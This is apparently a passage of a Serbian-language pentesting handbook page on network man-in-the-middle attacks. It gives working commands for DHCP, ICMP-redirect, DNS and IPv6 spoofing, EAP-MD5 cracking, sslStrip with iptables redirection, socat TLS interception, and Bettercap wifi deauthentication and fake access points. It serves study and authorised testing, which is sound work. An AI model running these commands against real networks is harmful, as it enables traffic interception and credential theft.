!python /usr/share/responder/DHCP.py -i 10.0.0.100 -d example.org -r 10.0.0.1 -p 10.0.0.100 -s 10.0.0.1 -n 255.255.255.0 -I eth1 -w "http://10.0.0.100/wpad.dat" -S -R

EAP napadi

Evo nekih od taktika napada koje se mogu koristiti protiv 802.1X implementacija:

  • Aktivno brute-force otkrivanje lozinki putem EAP
  • Napad na RADIUS server sa neispravnim EAP sadržajem **(eksploati)
  • Snimanje EAP poruka i offline otkrivanje lozinki (EAP-MD5 i PEAP)
  • Prisiljavanje EAP-MD5 autentifikacije da zaobiđe TLS validaciju sertifikata
  • Umetanje zlonamernog mrežnog saobraćaja prilikom autentifikacije koristeći hub ili slično

Ako je napadač između žrtve i servera za autentifikaciju, mogao bi pokušati da degradira (ako je potrebno) autentifikacijski protokol na EAP-MD5 i snimi pokušaj autentifikacije. Zatim bi mogao da koristi brute-force za ovo:

eapmd5pass r pcap.dump w /usr/share/wordlist/sqlmap.txt

FHRP (GLBP & HSRP) Attacks

FHRP (First Hop Redundancy Protocol) je klasa mrežnih protokola dizajniranih da kreiraju vrući redundantni sistem rutiranja. Sa FHRP-om, fizički ruteri mogu biti kombinovani u jedan logički uređaj, što povećava otpornost na greške i pomaže u raspodeli opterećenja.

Inženjeri Cisco Systems-a su razvili dva FHRP protokola, GLBP i HSRP.

{% content-ref url="glbp-and-hsrp-attacks.md" %} glbp-and-hsrp-attacks.md {% endcontent-ref %}

RIP

Poznate su tri verzije Protokola za informisanje o rutiranju (RIP): RIP, RIPv2 i RIPng. Datagrami se šalju partnerima putem porta 520 koristeći UDP kod RIP i RIPv2, dok se datagrami emitiraju na UDP port 521 putem IPv6 multicast kod RIPng. Podrška za MD5 autentifikaciju je uvedena RIPv2. S druge strane, nativna autentifikacija nije uključena u RIPng; umesto toga, oslanja se na opcione IPsec AH i ESP zaglavlja unutar IPv6.

  • RIP i RIPv2: Komunikacija se vrši putem UDP datagrama na portu 520.
  • RIPng: Koristi UDP port 521 za emitovanje datagrama putem IPv6 multicast.

Napomena: RIPv2 podržava MD5 autentifikaciju dok RIPng ne uključuje nativnu autentifikaciju, oslanjajući se na IPsec AH i ESP zaglavlja u IPv6.

EIGRP Attacks

EIGRP (Enhanced Interior Gateway Routing Protocol) je dinamički protokol rutiranja. To je protokol zasnovan na udaljenosti. Ako nema autentifikacije i konfiguracije pasivnih interfejsa, napadač može ometati EIGRP rutiranje i izazvati trovanje tabela rutiranja. Štaviše, EIGRP mreža (drugim rečima, autonomni sistem) je ravna i nema segmentaciju u bilo koje zone. Ako napadač injektuje rutu, verovatno će se ova ruta proširiti kroz autonomni EIGRP sistem.

Da bi se napao EIGRP sistem, potrebno je uspostaviti komšiluk sa legitimnim EIGRP ruterom, što otvara mnoge mogućnosti, od osnovne rekognosciranja do raznih injekcija.

FRRouting vam omogućava da implementirate virtuelni ruter koji podržava BGP, OSPF, EIGRP, RIP i druge protokole. Sve što treba da uradite je da ga postavite na sistem napadača i možete se zapravo pretvarati da ste legitimni ruter u rutirajućem domenu.

{% content-ref url="eigrp-attacks.md" %} eigrp-attacks.md {% endcontent-ref %}

Coly ima mogućnosti za presretanje EIGRP (Enhanced Interior Gateway Routing Protocol) emitovanja. Takođe omogućava injekciju paketa, što se može iskoristiti za promenu konfiguracija rutiranja.

OSPF

U protokolu Open Shortest Path First (OSPF) MD5 autentifikacija se obično koristi za obezbeđivanje sigurne komunikacije između rutera. Međutim, ova sigurnosna mera može biti kompromitovana korišćenjem alata kao što su Loki i John the Ripper. Ovi alati su sposobni da hvataju i razbijaju MD5 hešove, otkrivajući autentifikacioni ključ. Kada se ovaj ključ dobije, može se koristiti za uvođenje novih informacija o rutiranju. Za konfiguraciju parametara rute i uspostavljanje kompromitovanog ključa koriste se Injection i Connection kartice, redom.

  • Hvatanje i razbijanje MD5 hešova: Alati kao što su Loki i John the Ripper se koriste u tu svrhu.
  • Konfiguracija parametara rute: Ovo se vrši putem Injection kartice.
  • Postavljanje kompromitovanog ključa: Ključ se konfiguriše pod Connection karticom.

Other Generic Tools & Sources

  • Above: Alat za skeniranje mrežnog saobraćaja i pronalaženje ranjivosti
  • Možete pronaći neke dodatne informacije o mrežnim napadima ovde.

Spoofing

Napadač konfiguriše sve mrežne parametre (GW, IP, DNS) novog člana mreže šaljući lažne DHCP odgovore.

Ettercap
yersinia dhcp -attack 2 #More parameters are needed

ARP Spoofing

Proverite prethodni odeljak.

ICMPRedirect

ICMP Redirect se sastoji od slanja ICMP paketa tipa 1 kod 5 koji ukazuje da je napadač najbolji način za pristup IP-u. Tada, kada žrtva želi da kontaktira IP, poslaće paket kroz napadača.

Ettercap
icmp_redirect
hping3 [VICTIM IP ADDRESS] -C 5 -K 1 -a [VICTIM DEFAULT GW IP ADDRESS] --icmp-gw [ATTACKER IP ADDRESS] --icmp-ipdst [DST IP ADDRESS] --icmp-ipsrc [VICTIM IP ADDRESS] #Send icmp to [1] form [2], route to [3] packets sent to [4] from [5]

DNS Spoofing

Napadač će rešiti neke (ili sve) domene koje žrtva traži.

set dns.spoof.hosts ./dns.spoof.hosts; dns.spoof on

Konfigurišite vlastiti DNS sa dnsmasq

apt-get install dnsmasqecho "addn-hosts=dnsmasq.hosts" > dnsmasq.conf #Create dnsmasq.confecho "127.0.0.1   domain.example.com" > dnsmasq.hosts #Domains in dnsmasq.hosts will be the domains resolved by the Dsudo dnsmasq -C dnsmasq.conf --no-daemon
dig @localhost domain.example.com # Test the configured DNS

Lokalni prolazi

Više ruta do sistema i mreža često postoji. Nakon izrade liste MAC adresa unutar lokalne mreže, koristite gateway-finder.py da identifikujete hostove koji podržavaju IPv4 prosleđivanje.

root@kali:~# git clone https://github.com/pentestmonkey/gateway-finder.git
root@kali:~# cd gateway-finder/
root@kali:~# arp-scan -l | tee hosts.txt
Interface: eth0, datalink type: EN10MB (Ethernet)
Starting arp-scan 1.6 with 256 hosts (http://www.nta-monitor.com/tools/arp-scan/)
10.0.0.100     00:13:72:09:ad:76       Dell Inc.
10.0.0.200     00:90:27:43:c0:57       INTEL CORPORATION
10.0.0.254     00:08:74:c0:40:ce       Dell Computer Corp.

root@kali:~/gateway-finder# ./gateway-finder.py -f hosts.txt -i 209.85.227.99
gateway-finder v1.0 http://pentestmonkey.net/tools/gateway-finder
[+] Using interface eth0 (-I to change)
[+] Found 3 MAC addresses in hosts.txt
[+] We can ping 209.85.227.99 via 00:13:72:09:AD:76 [10.0.0.100]
[+] We can reach TCP port 80 on 209.85.227.99 via 00:13:72:09:AD:76 [10.0.0.100]

Spoofing LLMNR, NBT-NS, and mDNS

Za lokalno rešavanje hostova kada DNS pretrage nisu uspešne, Microsoft sistemi se oslanjaju na Link-Local Multicast Name Resolution (LLMNR) i NetBIOS Name Service (NBT-NS). Slično tome, Apple Bonjour i Linux zero-configuration implementacije koriste Multicast DNS (mDNS) za otkrivanje sistema unutar mreže. Zbog neautentifikovane prirode ovih protokola i njihove operacije preko UDP, emitovanjem poruka, mogu ih iskoristiti napadači koji imaju za cilj da preusmere korisnike na zlonamerne usluge.

Možete se pretvarati da ste usluge koje traže hostovi koristeći Responder za slanje lažnih odgovora.
Pročitajte ovde više informacija o kako se pretvarati da ste usluge sa Responder-om.

Spoofing WPAD

Pregledači obično koriste Web Proxy Auto-Discovery (WPAD) protokol za automatsko preuzimanje proxy podešavanja. To uključuje preuzimanje konfiguracionih detalja sa servera, posebno putem URL-a kao što je "http://wpad.example.org/wpad.dat". Otkriće ovog servera od strane klijenata može se dogoditi kroz različite mehanizme:

  • Kroz DHCP, gde se otkrivanje olakšava korišćenjem posebnog koda 252.
  • Preko DNS, što uključuje pretragu za imenom hosta označenim kao wpad unutar lokalne domene.
  • Putem Microsoft LLMNR i NBT-NS, koji su mehanizmi povratne veze korišćeni u slučajevima kada DNS pretrage ne uspevaju.

Alat Responder koristi ovaj protokol delujući kao zlonameran WPAD server. Koristi DHCP, DNS, LLMNR i NBT-NS da zavarava klijente da se povežu sa njim. Da biste dublje istražili kako se usluge mogu pretvarati koristeći Responder proverite ovo.

Spoofing SSDP and UPnP devices

Možete ponuditi različite usluge u mreži kako biste pokušali da prevarite korisnika da unese neke plain-text akreditive. Više informacija o ovom napadu u Spoofing SSDP and UPnP Devices.

IPv6 Neighbor Spoofing

Ovaj napad je vrlo sličan ARP Spoofingu, ali u svetu IPv6. Možete navesti žrtvu da pomisli da IPv6 GW ima MAC adresu napadača.

sudo parasite6 -l eth0 # This option will respond to every requests spoofing the address that was requested
sudo fake_advertise6 -r -w 2 eth0 <Router_IPv6> #This option will send the Neighbor Advertisement packet every 2 seconds

IPv6 Router Advertisement Spoofing/Flooding

Neki operativni sistemi podrazumevano konfigurišu gateway iz RA paketa poslatih u mreži. Da biste proglasili napadača kao IPv6 ruter, možete koristiti:

sysctl -w net.ipv6.conf.all.forwarding=1 4
ip route add default via <ROUTER_IPv6> dev wlan0
fake_router6 wlan0 fe80::01/16

IPv6 DHCP spoofing

Podrazumevano, neki operativni sistemi pokušavaju da konfigurišu DNS čitajući DHCPv6 paket u mreži. Tada bi napadač mogao poslati DHCPv6 paket da se konfiguriše kao DNS. DHCP takođe obezbeđuje IPv6 žrtvi.

dhcp6.spoof on
dhcp6.spoof.domains <list of domains>

mitm6

HTTP (lažna stranica i JS kod injekcija)

Internet napadi

sslStrip

U suštini, ono što ovaj napad radi je da, u slučaju da korisnik pokuša da pristupi HTTP stranici koja se preusmerava na HTTPS verziju. sslStrip će održavati HTTP vezu sa klijentom i HTTPS vezu sa serverom tako da će moći da snifa vezu u čistom tekstu.

apt-get install sslstrip
sslstrip -w /tmp/sslstrip.log --all - l 10000 -f -k
#iptables --flush
#iptables --flush -t nat
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
iptables -A INPUT -p tcp --destination-port 10000 -j ACCEPT

Više informacija ovde.

sslStrip+ i dns2proxy za zaobilaženje HSTS

Razlika između sslStrip+ i dns2proxy u odnosu na sslStrip je u tome što će preusmeriti na primer www.facebook.com na wwww.facebook.com (obratite pažnju na dodatno "w") i postaviće adresu ovog domena kao IP napadača. Na ovaj način, klijent će se povezati na wwww.facebook.com (napadač), ali u pozadini sslstrip+ će održavati pravu vezu putem https sa www.facebook.com.

Cilj ove tehnike je da izbegne HSTS jer wwww.facebook.com neće biti sačuvan u kešu pregledača, tako da će preglednik biti prevaren da izvrši facebook autentifikaciju u HTTP.
Napomena: da bi se izvršio ovaj napad, žrtva mora prvo pokušati da pristupi http://www.faceook.com a ne https. To se može uraditi modifikovanjem linkova unutar http stranice.

Više informacija ovde, ovde i ovde.

sslStrip ili sslStrip+ više ne funkcionišu. To je zato što postoje HSTS pravila unapred sačuvana u pregledačima, tako da čak i ako je prvi put da korisnik pristupa "važnom" domenu, on će mu pristupiti putem HTTPS. Takođe, obratite pažnju da unapred sačuvana pravila i druga generisana pravila mogu koristiti oznaku includeSubdomains tako da wwww.facebook.com primer iz prethodnog dela više neće raditi jer facebook.com koristi HSTS sa includeSubdomains.

TODO: easy-creds, evilgrade, metasploit, factory

TCP slušanje na portu

sudo nc -l -p 80
socat TCP4-LISTEN:80,fork,reuseaddr -

TCP + SSL slušanje na portu

Generišite ključeve i samopotpisani sertifikat

FILENAME=server
# Generate a public/private key pair:
openssl genrsa -out $FILENAME.key 1024
# Generate a self signed certificate:
openssl req -new -key $FILENAME.key -x509 -sha256 -days 3653 -out $FILENAME.crt
# Generate the PEM file by just appending the key and certificate files:
cat $FILENAME.key $FILENAME.crt >$FILENAME.pem

Slušanje pomoću sertifikata

sudo socat -v -v openssl-listen:443,reuseaddr,fork,cert=$FILENAME.pem,cafile=$FILENAME.crt,verify=0 -

Slušanje koristeći sertifikat i preusmeravanje na hostove

sudo socat -v -v openssl-listen:443,reuseaddr,fork,cert=$FILENAME.pem,cafile=$FILENAME.crt,verify=0  openssl-connect:[SERVER]:[PORT],verify=0

Nekada, ako klijent proveri da li je CA validan, mogli biste poslužiti sertifikat drugog imena hosta potpisan od strane CA.
Još jedan zanimljiv test je da poslužite sertifikat traženog imena hosta, ali samopotpisan.

Druge stvari koje treba testirati su pokušaj potpisivanja sertifikata sa validnim sertifikatom koji nije validan CA. Ili koristiti validni javni ključ, primorati korišćenje algoritma kao što je diffie hellman (onog koji ne zahteva dešifrovanje bilo čega sa pravim privatnim ključem) i kada klijent zatraži probe pravog privatnog ključa (kao što je hash) poslati lažnu probu i očekivati da klijent to ne proveri.

Bettercap

# Events
events.stream off #Stop showing events
events.show #Show all events
events.show 5 #Show latests 5 events
events.clear

# Ticker (loop of commands)
set ticker.period 5; set ticker.commands "wifi.deauth DE:AD:BE:EF:DE:AD"; ticker on

# Caplets
caplets.show
caplets.update

# Wifi
wifi.recon on
wifi.deauth BSSID
wifi.show
# Fake wifi
set wifi.ap.ssid Banana
set wifi.ap.bssid DE:AD:BE:EF:DE:AD
set wifi.ap.channel 5
set wifi.ap.encryption false #If true, WPA2
wifi.recon on; wifi.ap

Active Discovery Notes

Imajte na umu da kada se UDP paket pošalje uređaju koji nema traženi port, šalje se ICMP (Port Unreachable).

ARP discover

ARP paketi se koriste za otkrivanje koji IP-ovi se koriste unutar mreže. PC mora poslati zahtev za svaku moguću IP adresu i samo oni koji se koriste će odgovoriti.

mDNS (multicast DNS)

Bettercap šalje MDNS zahtev (svakih X ms) tražeći _services_.dns-sd._udp.local mašina koja vidi ovaj paket obično odgovara na ovaj zahtev. Zatim, samo traži mašine koje odgovaraju na "services".

Tools

  • Avahi-browser (--all)
  • Bettercap (net.probe.mdns)
  • Responder

NBNS (NetBios Name Server)

Bettercap emituje pakete na port 137/UDP tražeći ime "CKAAAAAAAAAAAAAAAAAAAAAAAAAAA".

SSDP (Simple Service Discovery Protocol)

Bettercap emituje SSDP pakete tražeći sve vrste usluga (UDP Port 1900).

WSD (Web Service Discovery)

Bettercap emituje WSD pakete tražeći usluge (UDP Port 3702).

References


Bug bounty tip: prijavite se za Intigriti, premium bug bounty platformu koju su kreirali hakeri, za hakere! Pridružite nam se na https://go.intigriti.com/hacktricks danas, i počnite da zarađujete nagrade do $100,000!

{% embed url="https://go.intigriti.com/hacktricks" %}

{% hint style="success" %} Učite i vežbajte AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks
{% endhint %}